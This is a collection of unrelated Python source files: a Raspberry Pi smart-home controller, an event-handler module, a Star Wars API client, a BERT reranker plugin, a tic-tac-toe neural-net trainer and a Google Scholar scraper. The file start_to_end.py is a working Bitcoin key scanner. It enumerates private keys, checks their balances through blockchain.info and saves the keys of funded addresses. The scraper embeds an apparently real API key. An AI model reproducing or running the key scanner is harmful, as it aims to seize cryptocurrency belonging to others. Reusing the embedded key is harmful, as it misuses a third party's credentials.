ac_cold = ['FD','FD','30','03','40','17','00','34','20','01','2D','02','69','00','25','00','22','00','27','00','17','05','27','00','32','0A','26','00','26','01','2C','02','00','00','23','00','FF','FF','FF','FF','01','22','12','22','22','12','12','22','22','22','22','12','22','22','21','21','22','12','32','22','21','22','22','22','22','12','22','22','22','22','22','22','22','22','24','51','22','12','22','22','12','12','22','22','22','22','12','22','22','21','11','22','12','32','22','22','22','22','22','22','22','22','22','22','22','22','22','21','21','16','00','00','F0','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','04','76','3E','8E','DF','DF']
# 制热:
ac_warm = ['FD','FD','30','03','FF','00','00','3F','46','01','D1','08','43','00','09','00','88','00','0B','00','37','05','0B','00','5C','0C','0C','00','3D','01','10','00','18','01','0C','00','3C','00','11','00','01','12','21','11','11','12','11','11','11','11','11','21','11','11','12','12','11','21','31','11','12','11','11','11','11','21','11','11','11','11','11','11','12','12','24','51','12','21','11','11','12','11','11','11','11','11','21','11','11','12','67','70','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','07','00','04','76','01','B8','DF','DF']
# 投影仪:
projector = ['FD','FD','30','03','62','87','00','34','21','01','24','02','68','00','23','00','20','00','23','00','69','0A','24','00','22','01','25','02','33','00','11','00','7B','00','11','00','00','00','0F','00','01','12','22','22','11','21','21','21','22','22','21','22','11','11','12','11','23','41','12','22','22','11','21','21','21','22','22','21','52','16','66','65','66','57','F0','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','30','DF','DF']
def init():
GPIO.setup(DS, GPIO.OUT)
GPIO.setup(SHCP, GPIO.OUT)
GPIO.setup(STCP, GPIO.OUT)
GPIO.output(DS, GPIO.LOW)
GPIO.output(SHCP, GPIO.LOW)
GPIO.output(STCP, GPIO.LOW)
def writeBit(data):
GPIO.output(DS, data)
GPIO.output(SHCP, GPIO.LOW)
GPIO.output(SHCP, GPIO.HIGH)
# 写入8位LED的状态
def writeByte(data):
for i in range(0, 8):
writeBit((data >> i) & 0x01)
# 状态刷新信号
GPIO.output(STCP, GPIO.LOW)
GPIO.output(STCP, GPIO.HIGH)
# 单次哔声
def beep(seconds):
GPIO.output(PIN_NO_BEEP, GPIO.LOW)
time.sleep(seconds)
GPIO.output(PIN_NO_BEEP, GPIO.HIGH)
def send(send_data):
if (ser.isOpen()):
#ser.write(send_data.encode('utf-8')) #utf-8 编码发送
ser.write(binascii.a2b_hex(send_data)) #Hex发送
#print("发送成功",send_data)
else:
print("send failed")
#每5秒执行一次
def sleeptime(hour,min,sec):
return hour*3600 + min*60 + sec
# the lightloop threading
def lightLoop():
while True:
global STOP_FLAG
if STOP_FLAG:
continue
for i in [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x00]:
writeByte(i)
time.sleep(0.1)
def smartmode():
while True:
global AUTOFLAG
if not AUTOFLAG:
continue
t = SAKS.ds18b20.temperature
print(t)
# input the nodedata
result = os.popen('/home/pi/smarthome/neural_network/SmartHome {} 50'.format(int(t)))
res = result.read()
# close ac
if '0' in res:
print('neural network decision close ac')
for i in range(len(ac_close)):
send(ac_close[i])
# 空调关闭
SAKS.ledrow.off_for_index(0)
# coldmode
if '1' in res:
print('neural network decision code mode')
for i in range(len(ac_cold)):
send(ac_cold[i])
# warmmode
if '2' in res:
print('neural network decision warm code')
for i in range(len(ac_warm)):
send(ac_warm[i])
# Repeat every 5 minute
time.sleep(10)
def main():
str1 = '0'
str2 = '0'
t1 = threading.Thread(target=lightLoop)
t2 = threading.Thread(target=smartmode)
t1.start()
t2.start()
while True:
time.sleep(sleeptime(0,0,2))
#宣告字符串初始变量为0
# 连接或创建数据库
conn = sqlite3.connect('/home/pi/smarthome/web_ui/db.sqlite3')
c = conn.cursor()
print ("Opened database successfully")
# 创建表
#c.execute('create table myhome_commands (id Integer primary key autoincrement , intent Text , slots Text)')
#print ("create myhome_commands table success")
#conn.commit()
# #写入假data
# c.execute("INSERT INTO myhome_commands (intent,slots) \
# VALUES ('INTENT_ERROR', '' )")
# conn.commit()
# print ("Records created successfully")
# 读取sqlite数据库data
cursor = c.execute("SELECT intent, slots from myhome_commands")
for row in cursor:
payload = '{"intent":"%s","slots":"%s","slaveID":3,"control":1,"command_first_byte":1,"command_second_byte":2,"command_third_byte":3,"command_fourth_byte":4}' \
%(row[0], row[1])
# 判断读取到的字符串是否有变换(语音控制的输出)
if str1 in row[0]:
if str2 in row[1]:
print('not new command')
break
else:
print('new command')
str1 = row[0]
str2 = row[1]
else:
print('new command')
str1 = row[0]
str2 = row[1]
print (payload)
if row[0]== 'AC_OPEN' and row[1] == '':
print("open ac")
for i in range(len(ac_open)):
send(ac_open[i])
# 空调打开指示灯
SAKS.ledrow.on_for_index(0)
elif row[0]== 'AC_CLOSE' and row[1] == '':
print('close ac')
for i in range(len(ac_close)):
send(ac_close[i])
# 空调关闭指示灯
SAKS.ledrow.off_for_index(0)
elif row[0]== 'AC_COLD' and row[1] == '':
print('code mode')
for i in range(len(ac_cold)):
send(ac_cold[i])
elif row[0]== 'AC_WARM' and row[1] == '':
print('warm code')
for i in range(len(ac_warm)):
send(ac_warm[i])
elif row[0]== 'AC_DOWN' and row[1] == '':
print('lower tem')
for i in range(len(ac_down)):
send(ac_down[i])
elif row[0]== 'AC_UP' and row[1] == '':
print('higher tem')
for i in range(len(ac_up)):
send(ac_up[i])
elif row[0]== 'OPEN_PPT' and row[1] == '':
print('open projector')
for i in range(len(projector)):
send(projector[i])
# 投影仪打开指示灯
SAKS.ledrow.on_for_index(1)
elif row[0]== 'CLOSE_PPT' and row[1] == '':
print('close projector')
for i in range(len(projector)):
send(projector[i])
# 投影仪关闭
SAKS.ledrow.off_for_index(1)
elif row[0]== 'OPEN_BOX' and row[1] == '':
print('open audio')
# 音响开
global STOP_FLAG
STOP_FLAG = False
elif row[0]== 'CLOSE_BOX' and row[1] == '':
# global STOP_FLAG
STOP_FLAG = True
print('close audio')
elif row[0] == 'AUTOMODE' and row[1] == '':
print('smart mode')
global AUTOFLAG
AUTOFLAG = True
SAKS.ledrow.on_for_index(2)
elif row[0] == 'NORMALMODE' and row[1] == '':
print('normal mode')
# global AUTOFLAG
AUTOFLAG = False
SAKS.ledrow.off_for_index(2)
elif row[0]== 'INTENT_ERROR' and row[1] == '':
print('INTENT ERROR')
# 蜂鸣器警告
beep(0.05)
#温度显示
temp = SAKS.ds18b20.temperature
SAKS.digital_display.show(("%.2f" % temp).replace(' ','#'))
# #创建表
# c.execute('create table myhome_nodedata (id Integer primary key autoincrement , time Text , localshortaddr Text , gateway_id Text , slaveId Text , humidity Integer , temperature Integer , light Integer , noise Integer , co2_simulation Integer , co2_binarization Integer)')
# print ("create myhome_nodedata table success")
# conn.commit()
#写入data
sql = "insert into myhome_nodedata(time,localshortaddr, gateway_id,slaveId, humidity, temperature,light, noise, co2_simulation, co2_binarization)values('%s','%s','%s','%s',%f,%f,%f,%f,%f,%f)" % (0,0,0,0,63.2, temp,862.13,77.61,0.14,0.14)
conn.execute(sql)
conn.commit()
print ("Records created successfully insert into myhome_nodedata values")
#beep(0.05)
print ("Operation done successfully")
conn.close()
if __name__ == '__main__':
STOP_FLAG = True
AUTOFLAG = False
try:
SAKS = SAKSHAT()
GPIO.setmode(GPIO.BCM)
GPIO.setup(PIN_NO_BEEP, GPIO.OUT, initial=GPIO.HIGH)
ser = serial.Serial('/dev/ttyAMA0',9600)
if(ser.isOpen()):
print("open serial successful")
else:
print("open serial failed")
init()
while True:
main()
except KeyboardInterrupt:
print("except")
#LED组全关
writeByte(0x00)
GPIO.cleanup()
|
event.py
|
# -*- coding: utf-8 -*-
# MIT License
#
# Copyright 2020 Kevin G. Schlosser
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be included in all copies
# or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
# FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
"""
This file is part of the **micasaverde_vera**
project https://github.com/kdschlosser/MiCasaVerde_Vera.
:platform: Unix, Windows, OSX
:license: MIT
:synopsis: events
.. moduleauthor:: Kevin Schlosser @kdschlosser <kevin.g.schlosser@gmail.com>
"""
from fnmatch import fnmatchcase
import threading
import logging
from . import utils
logger = logging.getLogger(__name__)
class _NotificationHandler(object):
def __init__(self):
self._callbacks = {}
self.event_callback_threads = True
@utils.logit
def bind(self, event, callback):
event = event.lower()
if event not in self._callbacks:
self._callbacks[event] = []
event_handler = EventHandler(event, callback)
self._callbacks[event] += [event_handler]
return event_handler
@utils.logit
def unbind(self, event_handler):
event = event_handler.event_name
if event in self._callbacks:
if event_handler in self._callbacks[event]:
self._callbacks[event].remove(event_handler)
if not self._callbacks[event]:
del self._callbacks[event]
@utils.logit
def notify(self, event_object, event):
for event_name, event_handlers in self._callbacks.items():
if fnmatchcase(event.lower(), event_name):
for event_handler in event_handlers:
event_handler.event = event
event_handler.event_object = event_object
NotificationHandler = _NotificationHandler()
Notify = NotificationHandler.notify
class EventHandler(object):
def __init__(self, event_name, callback, event_handler=None):
self.__event = None
self.event_name = event_name
self.__callback = callback
self.__event_object = None
if event_handler is None:
event_handler = self
self.__event_handler = event_handler
@property
def event(self):
return self.event_name if self.__event is None else self.__event
@event.setter
def event(self, event):
self.__event = event
def _run_in_thread(self, event_object):
self.__event_object = event_object
t = threading.Thread(target=self.__callback, args=(self,))
t.daemon = True
t.start()
def event_object(self, event_object):
if NotificationHandler.event_callback_threads:
event = self.copy()
event.event = self.__event
event._run_in_thread(event_object)
else:
self.__event_object = event_object
self.__callback(self)
event_object = property(fset=event_object)
def __getattr__(self, item):
if item in self.__dict__:
return self.__dict__[item]
return getattr(self.__event_object, item)
@utils.logit
def unbind(self):
NotificationHandler.unbind(self.__event_handler)
@utils.logit
def copy(self):
return EventHandler(
self.event_name,
self.__callback,
self.__event_handler
)
|
swapi.py
|
import requests
import requests_cache
import threading
from api import Api
class Swapi(Api):
_page_size=10
_base_url = 'https://swapi.dev/api/'
def __init__(self, cache=True):
if cache:
requests_cache.install_cache('.swapi_cache', backend='sqlite', expire_after=3600)
def do_request(self, url):
response = requests.get(url)
if response.status_code != 200:
raise Exception('Unsucessful API response: %d' % response.status_code)
try:
return response.json()
except ValueError as err:
raise Exception('Invalid JSON response from API') from err
def _get_last_page(self, count):
return int(count / self._page_size) + (1 if count % self._page_size > 0 else 0)
def _call_extend_result(self, url, results=[]):
rjson = self.do_request(url)
if 'results' in rjson:
results.extend(rjson['results'])
else:
results.extend(rjson)
return results
def call(self, url):
rjson = self.do_request(url)
results = rjson
if 'results' in rjson:
results = rjson['results']
if 'next' in rjson and rjson['next'] is not None:
threads = []
for page in range(2, self._get_last_page(rjson['count']) + 1):
th = threading.Thread(target=self._call_extend_result, args=(url + ('?page=%d' % page), results))
threads.append(th)
th.start()
for th in threads:
th.join()
return results
def get_root(self):
return self.call(self._base_url)
def get_resource(self, resource, id=0):
url = '%s%s/' % (self._base_url, resource)
if id > 0:
url = '%s%d/' % (url, id)
return self.call(url)
|
start_to_end.py
|
import threading
import os
import time
import random
import requests
import json
from bit import Key
from bit.format import bytes_to_wif
import traceback
# maxPage = int(pow(2, 256) / 128)
maxPage = 904625697166532776746648320380374280100293470930272690489102837043110636675
def getRandPage():
return random.randint(1, maxPage)
def getPage(pageNum):
keyList = []
addrList = []
addrStr1 = ""
addrStr2 = ""
num = (pageNum - 1) * 128 + 1
try:
for i in range(num, num + 128):
key1 = Key.from_int(i)
wif = bytes_to_wif(key1.to_bytes(), compressed=False)
key2 = Key(wif)
keyList.append(wif)
addrList.append(key2.address)
addrList.append(key1.address)
if len(addrStr1): addrStr1 = addrStr1 + "|"
addrStr1 = addrStr1 + key2.address
if len(addrStr2): addrStr2 = addrStr2 + "|"
addrStr2 = addrStr2 + key1.address
except:
pass
return [keyList, addrList, addrStr1, addrStr2]
'''
def getPage(pageNum):
try:
r = requests.get(url='https://keys.lol/bitcoin/%d' % pageNum, headers={'User-agent': 'Mozilla/5.0'}, timeout=5)
# r = requests.get(url='https://keys.lol/bitcoin/1',headers={'User-agent': 'Mozilla/5.0'}, timeout=5)
# r = requests.get(url='https://www.opennet.ru/', timeout=5)
print('https://keys.lol/bitcoin/%d' % pageNum)
print('requests=', r)
r = r.content
print("r=", r)
except:
return []
keys = r.split("how-this-works!/")
addrs = r.split("blockchain.com/btc/address/")
keyList = []
addrList = []
addrStr1 = ""
addrStr2 = ""
for i in range(1, len(keys)):
key = keys[i].split("\"")[0]
keyList.append(key)
for i in range(1, len(addrs)):
addr = addrs[i].split("\"")[0]
addrList.append(addr)
if i % 2 == 1:
if len(addrStr1): addrStr1 = addrStr1 + "|"
addrStr1 = addrStr1 + addr
else:
if len(addrStr2): addrStr2 = addrStr2 + "|"
addrStr2 = addrStr2 + addr
return [keyList, addrList, addrStr1, addrStr2]
'''
def getBalances(addrStr):
balances = "security"
while True:
if "security" not in balances: break
secAddr = balances.split("effects address ")
if len(secAddr) >= 2:
secAddr = secAddr[1].split(".")[0]
addrStr = addrStr.replace(secAddr + "|", "")
addrStr = addrStr.replace("|" + secAddr, "")
try:
r = requests.get(url='http://blockchain.info/multiaddr?active=%s' % addrStr, timeout=5)
# print ("requests=", r.text)
balances = r.text
except:
return
try:
balances = json.loads(balances)
balances = balances['addresses']
except:
print(balances)
return balances
getCount = 0
page = 1
fp_found = open("found.txt", "a+")
fp_fund = open("fund.txt", "a+")
try:
start_page_file = open("start_page.txt", "r+")
page = int(list(start_page_file)[-1])
except:
start_page_file = open("start_page.txt", "x+")
def getWallet():
global getCount
global page
while page <= maxPage:
# page = getRandPage()
print("page=", page)
pageRet = getPage(page)
try:
balancesRet = getBalances(pageRet[2])
for balance in balancesRet:
getCount = getCount + 1
if balance['final_balance'] <= 0 and balance['total_sent'] <= 0: continue
key = ""
isCompress = 0
for i in range(0, len(pageRet[1])):
if balance['address'] == pageRet[1][i]:
key = pageRet[0][int(i / 2)]
if i % 2 == 1: isCompress = 1
break
if key == "": continue
fp_found.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(
balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
if balance['final_balance'] > 0:
fp_fund.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(
balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
print(isCompress, balance['final_balance'], balance['total_sent'], key, balance['address'])
balancesRet = getBalances(pageRet[3])
for balance in balancesRet:
getCount = getCount + 1
if balance['final_balance'] <= 0 and balance['total_sent'] <= 0: continue
key = ""
isCompress = 1
for i in range(0, len(pageRet[1])):
if balance['address'] == pageRet[1][i]:
key = pageRet[0][int(i / 2)]
if i % 2 == 1: isCompress = 1
break
if key == "": continue
fp_found.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(
balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
if balance['final_balance'] > 0:
fp_fund.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(
balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
print(isCompress, balance['final_balance'], balance['total_sent'], key, balance['address'])
fp_found.flush()
fp_fund.flush()
except:
traceback.print_exc()
continue
page = page + 1
start_page_file.seek(0)
start_page_file.write(str(page) + "\n")
start_page_file.flush()
start_page_file.truncate()
clearScreen()
print(getCount)
time.sleep(10)
def clearScreen():
os.system('clear')
def main():
threads = []
for i in range(1):
threads.append(threading.Thread(target=getWallet, args=()))
for t in threads:
time.sleep(1.0)
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
main()
|
__init__.py
|
from threading import Thread
from typing import List, Tuple
import tensorflow as tf
from queue import Queue
import numpy as np
from nboost.plugins.models.rerank.tf.bert import modeling, tokenization
from nboost.plugins.models.rerank.base import RerankModelPlugin
from nboost import defaults
import pathlib
class TfBertRerankModelPlugin(RerankModelPlugin):
def __init__(self, *args, verbose=False, **kwargs):
super().__init__(*args, **kwargs)
self.output_q = Queue()
self.input_q = Queue()
self.model_dir = pathlib.Path(self.model_dir)
ckpts = list(self.model_dir.glob('*.ckpt*'))
if not len(ckpts) > 0:
raise FileNotFoundError("Tensorflow model not found %s" % self.model_dir)
self.checkpoint = str(ckpts[0]).split('.ckpt')[0] + '.ckpt'
self.vocab_file = str(self.model_dir.joinpath('vocab.txt'))
self.bert_config_file = str(self.model_dir.joinpath('bert_config.json'))
if not verbose:
tf.logging.set_verbosity(tf.logging.ERROR)
self.model_thread = Thread(target=self.run_model)
self.model_thread.start()
@staticmethod
def create_model(bert_config, input_ids, input_mask, segment_ids,
labels, num_labels):
"""Creates a classification model."""
model = modeling.BertModel(
config=bert_config,
is_training=False,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=False)
output_layer = model.get_pooled_output()
hidden_size = output_layer.shape[-1].value
output_weights = tf.get_variable(
"output_weights", [num_labels, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"output_bias", [num_labels], initializer=tf.zeros_initializer())
with tf.variable_scope("loss"):
logits = tf.matmul(output_layer, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits, axis=-1)
one_hot_labels = tf.one_hot(labels, depth=num_labels, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
loss = tf.reduce_mean(per_example_loss)
return (loss, per_example_loss, log_probs)
def model_fn_builder(self, bert_config, num_labels, init_checkpoint):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
label_ids = features["label_ids"]
(total_loss, per_example_loss, log_probs) = self.create_model(
bert_config, input_ids, input_mask, segment_ids, label_ids,
num_labels)
tvars = tf.trainable_variables()
(assignment_map, initialized_variable_names
) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
output_spec = tf.estimator.EstimatorSpec(
mode=mode,
predictions={
"log_probs": log_probs,
"label_ids": label_ids,
})
return output_spec
return model_fn
def input_fn(self):
"""The actual input function."""
output_types = {
"input_ids": tf.int32,
"segment_ids": tf.int32,
"input_mask": tf.int32,
"label_ids": tf.int32,
}
dataset = tf.data.Dataset.from_generator(self.feature_generator, output_types)
dataset = dataset.padded_batch(
batch_size=self.batch_size,
padded_shapes={
"input_ids": [self.max_seq_len],
"segment_ids": [self.max_seq_len],
"input_mask": [self.max_seq_len],
"label_ids": [],
},
padding_values={
"input_ids": 0,
"segment_ids": 0,
"input_mask": 0,
"label_ids": 0,
},
drop_remainder=True)
return dataset
def run_model(self):
bert_config = modeling.BertConfig.from_json_file(self.bert_config_file)
assert self.max_seq_len <= bert_config.max_position_embeddings
run_config = tf.estimator.RunConfig(model_dir=str(self.model_dir))
model_fn = self.model_fn_builder(
bert_config=bert_config,
num_labels=2,
init_checkpoint=self.checkpoint)
estimator = tf.estimator.Estimator(
model_fn=model_fn,
config=run_config)
result = estimator.predict(input_fn=self.input_fn,
yield_single_examples=True)
for item in result:
self.output_q.put((item["log_probs"], item["label_ids"]))
def feature_generator(self):
tokenizer = tokenization.FullTokenizer(vocab_file=self.vocab_file, do_lower_case=True)
while True:
next = self.input_q.get()
if not next:
break
query, candidates = next
query = tokenization.convert_to_unicode(query)
query_token_ids = tokenization.convert_to_bert_input(
text=query, max_seq_length=self.max_seq_len, tokenizer=tokenizer,
add_cls=True)
for i, doc_text in enumerate(candidates):
doc_token_id = tokenization.convert_to_bert_input(
text=tokenization.convert_to_unicode(doc_text),
max_seq_length=self.max_seq_len - len(query_token_ids),
tokenizer=tokenizer,
add_cls=False)
query_ids = query_token_ids
doc_ids = doc_token_id
input_ids = query_ids + doc_ids
query_segment_id = [0] * len(query_ids)
doc_segment_id = [1] * len(doc_ids)
segment_ids = query_segment_id + doc_segment_id
input_mask = [1] * len(input_ids)
features = {
"input_ids": input_ids,
"segment_ids": segment_ids,
"input_mask": input_mask,
"label_ids": 0
}
yield features
def pad(self, candidates):
if len(candidates) % self.batch_size == 0:
return candidates
else:
candidates += ['PADDING DOC'] * (self.batch_size - (len(candidates) % self.batch_size))
return candidates
def rank(self, query: bytes, choices: List[str],
filter_results=defaults.filter_results) -> Tuple[List[int], List[float]]:
actual_length = len(choices)
candidates = self.pad(choices)
self.input_q.put((query, choices))
results = [self.output_q.get() for _ in range(len(candidates))][:actual_length]
log_probs, labels = zip(*results)
log_probs = np.stack(log_probs).reshape(-1, 2)
scores = log_probs[:, 1]
assert len(scores) == actual_length
if filter_results:
scores = np.extract(scores[:, 0] < scores[:, 1], scores)
if len(scores.shape) > 1 and scores.shape[1] == 2:
scores = np.squeeze(scores[:, 1])
return list(scores.argsort()[::-1]), list(scores)
def close(self):
self.input_q.put(None)
self.model_thread.join()
|
trainAI.py
|
from board import *
import tttAI as ai
import neuralnet as nn
import numpy as np
import time
import threading
emptyBoard = "0 0 0 0 0 0 0 0 0 "
nGames = None
f = [1, 1, 1, 3, 3, 1]
def takeTurn( mrk, brd, ai ):
"""Ask player mrk for square to place their marker."""
done = False
boardStr = brd.convertBoard()
while (not done):
sqr = ai.takeTurn(brd)
if ( brd.isBlank(sqr) ):
brd.markSquare(sqr, mrk)
boardStr += str(sqr)
done = True
return boardStr
def playRound(p1AI, p2AI):
"""Play a round of tic-tac-toe."""
brd = Board()
p1Moves = ""
p2Moves = ""
nMoves = 0
while ( True ):
#X moves:
mv = takeTurn("X", brd, p1AI)
if (mv[:-1] == emptyBoard):
mv = ""
else:
mv += "\n"
p1Moves += mv
nMoves += 1
#X wins:
if ( brd.gameWon() ):
return ( f[nMoves] * p1Moves, "", np.array([1,0,0]))
#cat's game:
elif ( not brd.movesLeft() ):
return (p1Moves, p2Moves, np.array([0,0,1]))
p2Moves += takeTurn("O", brd, p2AI) + "\n"
#O wins:
if ( brd.gameWon() ):
return ("", f[nMoves] * p2Moves, np.array([0,1,0]))
def playGames( player1, player2, n ):
"""Plays a round. prompts for new game."""
p1Moves = ""
p2Moves = ""
record = np.array([0,0,0])
for i in xrange(n):
mvs1, mvs2, res = playRound(player1, player2)
p1Moves += mvs1
p2Moves += mvs2
record += res
return (p1Moves, p2Moves, record)
def writeMoves(moves, pNum):
"""Writes the moves to disk."""
writeFile = open("p{0}.txt".format(pNum), 'w')
writeFile.write(moves)
writeFile.close()
return
def generateData():
"""Runs lesson zero where random players generate game data."""
p1File = open("p1.txt", 'w')
p2File = open("p2.txt", 'w')
p1AI = ai.RandomAI()
p2AI = ai.RandomAI()
p1Moves, p2Moves, record = playGames( p1AI, p2AI, nGames)
p1File.write(p1Moves)
p2File.write(p2Moves)
p1File.close()
p2File.close()
print "\n\nRandom Vs. Random:"
print "X: {0}, O: {1}, Tie: {2}\n\n".format(record[0], record[1], record[2])
return
def trainAIs(nnO, nnX, itr):
"""Performs one training sted of the tic tac toe AI's."""
dataX, yX = readin("p1.txt", int)
dataO, yO = readin("p2.txt", int)
t1 = threading.Thread( target = nnX.trainNetwork, args = (dataX, yX, l) )
t2 = threading.Thread( target = nnO.trainNetwork, args = (dataO, yO, l) )
start = time.time()
t1.start()
t2.start()
t1.join()
t2.join()
end = time.time()
print "\n\nLesson {0} completed in: {1} (s)\n\n".format(itr, end - start)
return
def learnTicTacToe(maxItr, l, inNodes, outNodes, *hiddenNodes):
"""Trains player to (first or second set by pNum) to play tic tac toe for at most maxItr lessons."""
nnX = nn.NeuralNet(inNodes, outNodes, *hiddenNodes)
nnO = nn.NeuralNet(inNodes, outNodes, *hiddenNodes)
#Generate game data:
generateData()
for itr in xrange(1, maxItr + 1):
trainAIs(nnO, nnX, itr)
playerX = ai.NNAI(nnX)
playerO = ai.NNAI(nnO)
#X AI Vs random player:
xMoves, _, xVsRand = playGames( playerX, ai.RandomAI(), nGames)
writeMoves(xMoves, 1)
#Random player Vs O AI:
_, oMoves, oVsRand = playGames( ai.RandomAI(), playerO, nGames)
writeMoves(oMoves, 2)
#X AI Vs O AI:
_, _, xVsO = playGames( playerX, playerO, nGames)
print "AI Vs. Random:"
print "X: {0}, O: {1}, Tie: {2}\n\n".format( xVsRand[0], xVsRand[1], xVsRand[2])
print "Random Vs. AI:"
print "X: {0}, O: {1}, Tie: {2}\n\n".format( oVsRand[0], oVsRand[1], oVsRand[2])
print "AI Vs. AI:"
print "X: {0}, O: {1}, Tie: {2}\n\n".format( xVsO[0], xVsO[1], xVsO[2])
nnX.toFile("p1-{0}".format(itr))
nnO.toFile("p2-{0}".format(itr))
return
def readin( path, DT = float ):
data = np.loadtxt( path, delimiter = " ", dtype=DT)
X = data[:,0:9]
m,n = X.shape
y = data[:,9].reshape((m,1))
return (X, y)
if __name__ == "__main__":
nGames = 12000
maxItr = 3
#Neural net parameters:
l = 0.1
inNodes = 9
outNodes = 9
hiddenNodes = (10, 10)
learnTicTacToe(maxItr, l, inNodes, outNodes, *hiddenNodes)
|
main.py
|
from multiprocessing import Process, Queue, Manager
import scrapy.spiders
from scrapy.crawler import CrawlerProcess
from urllib.parse import urlencode
import re
import json
def GoogleScholar(request):
def SearchResultsScraper(request):
def script(queue, output):
try:
API_KEY = '2e2d79e9d8b5d22114ae3b4b4ba6b507'
def get_url(url):
payload = {'api_key': API_KEY, 'url': url, 'country_code': 'us'}
proxy_url = 'http://api.scraperapi.com/?' + urlencode(payload)
return proxy_url
class SearchResultsSpider(scrapy.Spider):
name = 'GoogleScholarSearchResultsSpider'
# allowed_domains = ['scholar.google.com']
allowed_domains = ['api.scraperapi.com']
def start_requests(self):
url = 'https://scholar.google.com/scholar?' + urlencode({'hl': 'en', 'q': self.query})
# yield scrapy.Request(url, callback=self.parse, meta={'position': 0})
yield scrapy.Request(get_url(url), callback=self.parse, meta={'position': 0})
def parse(self, response):
print(response.url)
position = response.meta['position']
for res in response.xpath('//*[@data-rp]'):
# Links
links = [res.xpath('.//h3/a/@href').extract_first()]
# Title
temp = res.xpath('.//h3/a//text()').extract()
if not temp:
title = "[C] " + "".join(res.xpath('.//h3/span[@id]//text()').extract())
else:
title = "".join(temp)
# Snippet
snippet = "".join(res.xpath('.//*[@class="gs_rs"]//text()').extract()).replace("\u2026","...").replace("\u00a0","")
# Citations
if res.xpath('.//a[starts-with(text(),"Cited")]/text()').extract_first() is not None:
citations = res.xpath('.//a[starts-with(text(),"Cited")]/text()').extract_first().replace("Cited by ", "")
else:
citations = ""
# Citations Link
temp = res.xpath("//div[@class='gs_fl']/a[3]/@href").extract_first()
citations_link = "https://scholar.google.com" + temp if temp else ""
# Related Link
temp = res.xpath('.//a[starts-with(text(),"Related")]/@href').extract_first()
related_link = "https://scholar.google.com" + temp if temp else ""
# Version Link
temp = res.xpath(".//a[@class='gs_nph']/@href").extract_first()
versions_link = "https://scholar.google.com" + temp if temp else ""
# Version Count
if res.xpath('.//a[contains(text(),"version")]/text()').extract_first() is not None:
versions = res.xpath('.//a[contains(text(),"version")]/text()').extract_first().replace("All ", "").replace(" versions", "")
else:
versions = ""
# Publisher Data
publisher_data = "".join(res.xpath('.//div[@class="gs_a"]//text()').extract()).replace("\u2026","...").replace("\u00a0","")
year = re.search("\d+", publisher_data)[0]
if (publisher_data.split("-")[1].split(",")[0].strip() != re.search("\d+", publisher_data)[0]):
journal = publisher_data.split("-")[1].split(",")[0].strip()
else:
journal = ""
authors = []
for author in publisher_data.split("-")[0].split(","):
authors.append(author.strip())
position += 1
